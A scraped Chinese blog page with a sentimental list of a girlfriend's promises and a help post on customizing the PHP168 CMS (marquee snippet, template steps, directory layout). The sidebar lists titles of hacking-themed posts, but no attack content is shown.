13、为你剪指甲，让你改掉有心事就咬指甲的习惯
14、拉你一起去广场上吹肥皂泡泡
15、收起我的坏情绪，自己擦干脸上的泪，你看到我的时候我会尽量多的微笑
16、在电台点《天使与海豚》送给你
17、珍惜每一次和你的会面
18、在卡拉ok唱《勇气》的时候打电话给你
19、买烟给你，但是只买一点点，因为吸烟有害健康
20、让你背着我在屋子里打转
21、趴在你的肚子上和你一起看电视
22、一起洗澡，帮你擦干
23、看xxxx，学习做一个解风情的女人，而不一直是天真的小女孩
24、为爱变成一个笨笨的小女人
25、替你洗衣服，特别是臭袜子
26、帮你擦所有的皮鞋，不管你什么时候需要穿哪一双它们都是干净的
27、陪你到菜市场去买菜
28、吃光并称赞你做的菜
29、跟爸爸学会做他的金牌红烧蹄膀
30、保证手机的畅通，你随时都能找到我
31、告诉妈妈和你的故事，她有权了解谁把女儿变成一个女人
32、和你在卫生间里你好
33、好好保存你送我的每一件东西
34、用一个pp的小本本记下你发给我的每一条短信
35、默默地等你回来
36、不再见网友
37、你开心时比你还开心，你难过时比你还难过
38、真心地认为你做的每一件事都是有道理的
39、去照相馆拍情侣照，做成漂亮的小册子，我还要穿婚纱
40、把那只小熊一直放在床头
41、介绍我所有的好朋友给你认识
42、保护你不受一点委屈
43、申请一个我们的邮箱，写好多情书放在里面等你去看
44、每年都从家来看你
45、倒水哄你吃药
46、偷偷扯你的衣服角，提醒你要少喝酒
47、在你苦难的时候绝不放弃你
48、随时做好准备跟着你背井离乡
49、答应你的求婚，哪怕没有玫瑰和戒指（如果有这么一天）
50、在你不再爱我的时候静静地走开

强烈建议：凡有女孩能作到以上任意10条那你娶她吧没错的
................................20条你要努力娶到她啊
................................30条死皮赖脸也要娶到她
................................40条拼了老命也要娶到她
................................50条估计这种女孩已经绝种了

类别：无分类 | 评论(0) | 浏览(7861) | 收藏

2006年11月27日 02:33:48

PHP168整站V3.5的几个问题

如何修改公告信息滚动方向
后台——功能插件管理中心——公告信息——管理

<marquee scrollamount=1 direction=up height=120 onmouseover=this.stop(); onmouseout=this.start();> <CENTER>
<b><font color="#FF0000">$condb[h_title]</font></b> //标题颜色
</CENTER><br>　　$condb[h_txt_content]<br>//文字颜色

说明：以上的direction=up 是显示方向，up向上,down向下，left向左,right向右

height=120 方框高度
168整站系统风格制作说明
一个风格的制作,包括两个目录+一个PHP配置文件
举个例子默认的风格目录分别是:
images/php168/ 这是风格文件的图片存放目录,所有制作的风格都要取一个目录名,放在images/目录里
template/php168/ 这是风格文件的模板存放目录,所有制作的风格模板取一个目录名,放在template/目录里
php168/style/php168.php 这是风格参数配置文件,所有制作的风格都需要一个配置参数,放在此目录.

制作风格的入门步骤:
比如制作一个red风格,
第一步,复制文件php168/style/php168.php 为 php168/style/red.php 然后再修改php168/style/red.php里边的php168为red,因为目录名不再是php168
第二步创建一个图片目录images/red/ 以后所有新风格red的图片都放在此目录,
第三步,复制文件template/php168/head.htm为template/red/head.htm 然后再修改此新文件,一般情况只需要修改一个头部文件,就基本做成一个风格了,如是你想修改更多文件,
可以复制更多的文件到template/red/目录,因为默认系统在新目录找不到文件的话,就去php168目录去寻找,

另外关于标签的说明,标签指的是$label[***] 里边的***可以是任何字母,但不能雷同,往模板里任意地方插入任意$label[***]就可以在后台控制显示了
168整站系统部分目录功能介绍
/upload_files/ 此目录为附件存放目录,以后每个栏目上传的附件都会在里边自动创建一个子目录存放文件
/upload_files/face/system 用户头像目录,你可以添加更多的头像在里边
/upload_files/face/ 用户上传的头像会放在此目录
/upload_files/other/ 其他未知所在栏目的附件,将杂合的存在此目录

/template/ 模板目录,以后每个风格都会在此存放一个风格模板目录
/template/php168/ 默认风格目录,做风格时,建议复制一份出来修改,不要在原基本上修改,以免出错不可恢复
/template/php168/mod/ 标签调用的模板,一些标题及图片边框使用的模板,你可以修改也可以添加更多的标题模板
/template/php168/css.htm 网站公用整体风格样式表css控制文件
/template/php168/head.htm 网站公用头部文件,一般修改风格,只须修改这个就基本搞好了
/template/php168/index.htm 网站首页文件,你可以在里边添加更多的标签,然后在后台调用,标签是$label[abc] abc是举例,可以是任意字母
/template/php168/foot.htm 网站公用尾部文件
/template/php168/list.htm 文章系统,文章标题列表模板
/template/php168/bencandy.htm 文章系统,文章内容模板
/template/php168/comment.htm 评论页面模板
/template/php168/refreshto.htm 操作成功后跳转页面
/template/php168/showerr.htm 出错提示页面
/template/php168/comment_inc.htm 内容页底部的评论模板

/require/ 被调用的公共程序文件,一般不会直接显示在地址栏目上
/require/global.php 整个网站围绕调用的核心文件,做相关插件与程序可以直接调用此文件,因为此文件一般不会变动

/php168/ 站点文本与缓存数据存放目录,每个人的站点唯一区别就在这里.此目录每一个文件必须确保属性可写
/php168/admin_1.php 网站创始人,即是超级管理员保存文件,修改里边的用户名就可以改变超级管理员的身份
/php168/passport.php 整合外部PHP程序论坛的配置文件
/php168/web_center.php 网站核心配置文件,修改里边的会引起网站的设置立刻生效
/php168/web_config.php 数据库帐号密码存放文件,换空间后,需要修改
/php168/web_updir.php 里边记录着附件存放在哪个目录
/php168/mgroup/ 前台用户组权限设置缓存目录
/php168/passport/ 整合其他PHP程序的配置文件,此目录属性可以为只读不可写
/php168/sort_cache/ 栏目缓存文件
/php168/style/ 风格配置文件存放目录,每个风格都有一个对应的PHP配置文件
/php168/php168/table/ 调用内容标题的数据表结构配置文件
/php168/usr_info/ &n

快速编辑风格
背景色：	显示颜色
banner图：
背景图片：	重复：

快速编辑风格

博主资料

欢迎您的到来！

日历

日志分类

个人统计

文章搜索

友情链接

最新评论

存　档

日志文章列表

网站快速列入Google的最佳方法

网站流量统计，二十六步获得网站流量(新版)

从后台得到webshell技巧大汇总!!!!

神秘的命令和快捷方式

远程注入代码

Copy code

<VB，Java，C，Pascal，SQL，ASP，PHP，易语言，IIS，QB教程>

Java编程版教程帖收集专用帖！

让我们来偷窥黑客的工具箱

破解电信禁止路由上网的方法

教你几招判断你的系统是否被流氓侵犯

黑客扫描十种最易受攻击端口

改系统注册表实现Windows XP自动登录

网管员牢记十种较为常见服务器管理错误

系统进程全攻略

特大淫秽色情网站情色六月天主犯被判无期

网络入侵的14种可利用方法

谁见过如此经典的~~~~~~~~~~~~~~~~~~~~~

PHP168整站V3.5的几个问题

快速编辑风格

博主资料

欢迎您的到来！

日历

日志分类

个人统计

文章搜索

友情链接

最新评论

存 档

日志文章列表

存　档